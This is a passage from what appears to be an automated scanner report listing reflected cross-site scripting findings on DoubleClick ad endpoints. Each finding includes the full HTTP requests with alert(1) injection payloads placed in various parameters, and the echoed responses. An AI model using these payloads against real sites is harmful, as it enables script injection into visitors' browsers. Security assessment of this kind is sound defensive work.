rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1de/%2a/b%3B238011044%3B0-0%3B0%3B61158183%3B2321-160/600%3B41094506/41112293/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Ld0d27"-alert(1)-"77fb79f0b33&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2
...[SNIP]...

5.63. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6718e"-alert(1)-"d173b19848f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=6718e"-alert(1)-"d173b19848f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7172
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:47:56 GMT
Expires: Wed, 11 May 2011 15:47:56 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
AQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=6718e"-alert(1)-"d173b19848fhttp://hiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml?WT.mc_id=zkdCSAA0US1GI2DMH3Default4AAA7BR841270&cssiteid=1004575&csdartid=6332572641899793");
var fscUrl = url;
var fscU
...[SNIP]...

5.64. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c823"-alert(1)-"cae5aaf7af1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ6c823"-alert(1)-"cae5aaf7af1&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:51 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ6c823"-alert(1)-"cae5aaf7af1&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3De
...[SNIP]...

5.65. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91b9"-alert(1)-"9780ca6bc9b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807d91b9"-alert(1)-"9780ca6bc9b&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:47:09 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
TBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807d91b9"-alert(1)-"9780ca6bc9b&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3Default4AAA7BR841270%26cssiteid%3D1004575%26csdartid%3D6332572641899793");
va
...[SNIP]...

5.66. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 196aa"-alert(1)-"48bf399ba01 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1196aa"-alert(1)-"48bf399ba01&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:45:34 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
zsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1196aa"-alert(1)-"48bf399ba01&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3Default4
...[SNIP]...

5.67. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22619"-alert(1)-"516c1086529 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g22619"-alert(1)-"516c1086529&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:46:22 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g22619"-alert(1)-"516c1086529&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3Default4AAA7BR841270%26cssiteid%3D1004575%26csd
...[SNIP]...

5.68. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78cec"-alert(1)-"02ccfd40596 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L78cec"-alert(1)-"02ccfd40596&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:17 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/188/%2a/y%3B240475400%3B0-0%3B0%3B63325726%3B3454-728/90%3B41899793/41917580/2%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L78cec"-alert(1)-"02ccfd40596&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4
...[SNIP]...

5.69. http://ad.doubleclick.net/adj/N2434.access/B5401633 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2434.access/B5401633

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2693'-alert(1)-'9a20c2c6224 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2434.access/B5401633;sz=b2693'-alert(1)-'9a20c2c6224 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=121&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 50541
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:27:42 GMT
Expires: Wed, 11 May 2011 15:27:42 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=2691315;stragg=1;v=1;pid=62273654;aid=239402261;ko=0;cid=40271724;rid=40289511;rv=3;rn=6978095;";
this.swfParams = 'src=2691315&rv=3&rid=40289511&=b2693'-alert(1)-'9a20c2c6224&';
this.renderingId = "40289511";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

5.70. http://ad.doubleclick.net/adj/cardinals.mlb/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cardinals.mlb/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26910'-alert(1)-'f349f44d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cardinals.mlb/news;pageid=article;vkey=notebook_stl;pos=1;sz=728x90;tile=1;ord=889379305?&26910'-alert(1)-'f349f44d82=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://stlouis.cardinals.mlb.com/news/article.jsp?ymd=20110419&content_id=17985912&notebook_id=17993252&vkey=notebook_stl&c_id=stl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:36:37 GMT
Expires: Wed, 11 May 2011 15:41:37 GMT
Content-Length: 424

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/a;239857754;0-0;0;5695312;3454-728/90;41646731/41664518/1;;~okv=;pageid=article;vkey=notebook_stl;pos=1;sz=728x90;tile=1;;26910'-alert(1)-'f349f44d82=1;~aopt=2/1/ac/0;~sscs=%3fhttp://mlbnetwork.mlb.com/network/index.jsp">
...[SNIP]...

5.71. http://ad.doubleclick.net/adj/cardinals.mlb/news [pageid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cardinals.mlb/news

Issue detail

The value of the pageid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9026'%3balert(1)//65e97bef11b was submitted in the pageid parameter. This input was echoed as b9026';alert(1)//65e97bef11b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cardinals.mlb/news;pageid=b9026'%3balert(1)//65e97bef11b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://stlouis.cardinals.mlb.com/news/article.jsp?ymd=20110419&content_id=17985912&notebook_id=17993252&vkey=notebook_stl&c_id=stl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 381
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:35:25 GMT
Expires: Wed, 11 May 2011 15:40:25 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/i;197313047;0-0;0;5695312;4307-300/250;25584139/25601996/1;;~okv=;pageid=b9026';alert(1)//65e97bef11b;~aopt=2/1/ac/0;~sscs=%3fhttp://shop.mlb.com/giftCertificates/index.jsp">
...[SNIP]...

5.72. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [net parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37a35'%3balert(1)//afc6867632e was submitted in the net parameter. This input was echoed as 37a35';alert(1)//afc6867632e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911;net=37a35'%3balert(1)//afc6867632e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
